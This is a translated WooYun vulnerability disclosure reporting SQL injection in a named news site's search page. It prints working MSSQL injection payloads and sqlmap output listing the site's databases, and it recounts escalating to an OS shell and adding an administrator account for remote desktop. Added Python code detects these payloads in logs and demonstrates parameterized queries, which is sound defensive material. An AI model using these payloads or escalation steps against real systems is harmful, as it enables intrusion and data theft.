WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-04-09: Details sent to the vendor, awaiting vendor handling
2015-04-10: Vendor has confirmed; details disclosed to the vendor only
2015-04-20: Details disclosed to core white hats and domain experts
2015-04-30: Details disclosed to ordinary white hats
2015-05-10: Details disclosed to intern white hats
2015-05-25: Details disclosed to the public
As the title says...
POST injection: http://www.dgrb.cn/searchprocess.aspx --data="pst=1"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: pst
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: pst=1' AND 7029=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(121)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7029=7029) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(114)+CHAR(104)+CHAR(99)+CHAR(113))) AND 'FeeJ'='FeeJ

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: pst=1' UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(121)+CHAR(107)+CHAR(113)+CHAR(117)+CHAR(89)+CHAR(107)+CHAR(108)+CHAR(85)+CHAR(105)+CHAR(110)+CHAR(79)+CHAR(72)+CHAR(85)+CHAR(113)+CHAR(114)+CHAR(104)+CHAR(99)+CHAR(113)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pst=1'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pst=1' WAITFOR DELAY '0:0:5'--
---
[10:00:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[10:00:25] [INFO] testing if current user is DBA
current user is DBA: True
[10:00:26] [INFO] fetching database names
[10:00:26] [INFO] the SQL query used returns 14 entries
[10:00:26] [INFO] retrieved: "adbooking"
[10:00:26] [INFO] retrieved: "adbooking"
[10:00:27] [INFO] retrieved: "DgMedia"
[10:00:27] [INFO] retrieved: "ggBooking"
[10:00:27] [INFO] retrieved: "infomation"
[10:00:27] [INFO] retrieved: "master"
[10:00:27] [INFO] retrieved: "model"
[10:00:28] [INFO] retrieved: "msdb"
[10:00:28] [INFO] retrieved: "ReportServer"
[10:00:28] [INFO] retrieved: "ReportServerTempDB"
[10:00:28] [INFO] retrieved: "tempdb"
[10:00:28] [INFO] retrieved: "tst"
[10:00:29] [INFO] retrieved: "ums"
[10:00:29] [INFO] retrieved: "weight"
available databases [13]:
[*] adbooking
[*] DgMedia
[*] ggBooking
[*] infomation
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] tst
[*] ums
[*] weight
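The four payload shapes sqlmap reports above (error-based CONVERT(INT, ...), UNION ALL SELECT, a stacked query introduced by ';' and WAITFOR DELAY, and the time-based WAITFOR DELAY on its own) are exactly what a site operator would want to find in the application's request logs after such a test. The following Python is an added example, not part of the original report: it scans constructed, hypothetical request-log lines (the log format, with the URL-encoded POST body as the last field, is an assumption) for those signatures and returns the matching line numbers with the signatures each one hit.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the MSSQL injection shapes shown in the sqlmap output above.
SIGNATURES = {
    "error_based_convert": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "union_select": re.compile(r"union\s+(all\s+)?select\b", re.I),
    "time_based_waitfor": re.compile(r"waitfor\s+delay\b", re.I),
    "stacked_query": re.compile(r";\s*(waitfor|exec|select|insert|update|delete|drop|create)\b", re.I),
    "char_concat": re.compile(r"char\(\d+\)\s*\+\s*char\(", re.I),
}

# Constructed sample log lines. Hypothetical format:
# "<date> <time> <method> <path> <url-encoded POST body>".
SAMPLE_LOG = """\
2015-04-09 09:58:01 POST /searchprocess.aspx pst=1
2015-04-09 09:58:14 POST /searchprocess.aspx pst=booking+rate
2015-04-09 10:00:20 POST /searchprocess.aspx pst=1%27+AND+7029%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%2BCHAR%28101%29%29%29+AND+%27FeeJ%27%3D%27FeeJ
2015-04-09 10:00:21 POST /searchprocess.aspx pst=1%27+UNION+ALL+SELECT+CHAR%28113%29%2BCHAR%28101%29--
2015-04-09 10:00:22 POST /searchprocess.aspx pst=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--
2015-04-09 10:00:23 POST /searchprocess.aspx pst=1%27+WAITFOR+DELAY+%270%3A0%3A5%27--
"""


def extract_body(line):
    """Return the URL-decoded POST body of one log line, or "" if the line has no body field."""
    parts = line.split(" ", 4)
    return unquote_plus(parts[4]) if len(parts) == 5 else ""


def scan_log_lines(lines):
    """Return [(line_number, [signature names])] for every line whose body matches a signature.

    Bodies are decoded before matching so that %27 / %28 / %2B encoded payloads are seen
    in the same form the database would receive them.
    """
    findings = []
    for number, line in enumerate(lines, start=1):
        body = extract_body(line)
        hits = sorted(name for name, pattern in SIGNATURES.items() if pattern.search(body))
        if hits:
            findings.append((number, hits))
    return findings


if __name__ == "__main__":
    for number, hits in scan_log_lines(SAMPLE_LOG.splitlines()):
        print(f"line {number}: {', '.join(hits)}")
```

The signatures are deliberately narrow (they describe the payloads shown on this page, not SQL injection in general), so they are suited to confirming after the fact which requests hit the vulnerable parameter rather than to blocking traffic in front of the application.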
Since the account has DBA privileges, and the error message in the screenshot above reveals the site's absolute path, writing a shell is not a problem; I used sqlmap's --os-shell to look at the server information.
I don't know whether this account should exist.
Then add 123 to the administrators group; logging in over 3389 is not a problem (port 3389 is open!).
1. Filter parameters
2. Run the database with low privileges
3. Close unnecessary ports
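Fix 1 (parameter filtering) is most reliably achieved by binding user input as a query parameter instead of filtering strings, because a bound parameter is never parsed as SQL. The following Python is an added example, not code from the report or from the affected site: it uses the standard-library sqlite3 module as a stand-in for SQL Server (an assumption made so it runs offline; the table and rows are constructed) to show a search built by string concatenation beside its parameterized form, where the same quote-and-comment input is treated as literal text and matches nothing.

```python
import sqlite3


def make_demo_db():
    """Build an in-memory table with constructed sample rows (stand-in for the site's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO posts (title) VALUES (?)",
        [("Booking notice",), ("Rate card 2015",), ("Staff memo",)],
    )
    return conn


def search_concatenated(conn, pst):
    """Vulnerable pattern: the request parameter is pasted into the SQL text.

    A quote ends the string literal early and a trailing comment marker hides the
    rest of the statement, so the caller's input rewrites the WHERE clause.
    """
    sql = "SELECT title FROM posts WHERE title LIKE '%" + pst + "%'"
    return sorted(row[0] for row in conn.execute(sql))


def search_parameterized(conn, pst):
    """Hardened pattern: the parameter is bound by the driver.

    The SQL text is fixed; quotes and comment markers inside pst are data, so the
    query can only ever be the LIKE search the developer wrote.
    """
    sql = "SELECT title FROM posts WHERE title LIKE ?"
    return sorted(row[0] for row in conn.execute(sql, ("%" + pst + "%",)))


if __name__ == "__main__":
    db = make_demo_db()
    probe = "x' OR 1=1 --"  # same quote-and-comment shape as the payloads in the sqlmap output
    print("concatenated: ", search_concatenated(db, probe))   # every row comes back
    print("parameterized:", search_parameterized(db, probe))  # nothing matches the literal text
```

The same applies on the ASP.NET/SQL Server stack this site runs: pass the value through a SqlParameter rather than building the command text. Fix 2 complements it: a web login without sysadmin rights cannot run xp_cmdshell, which is what sqlmap's --os-shell depends on against SQL Server, so even a remaining injection no longer reaches the operating system.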
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-04-10 10:40
Thank you very much for your report. The issue in the report has been confirmed and reproduced. Affected data: high. Attack cost: low. Impact: high. Overall rating: high, rank: 12. We are contacting the relevant site administration unit to handle it.
None yet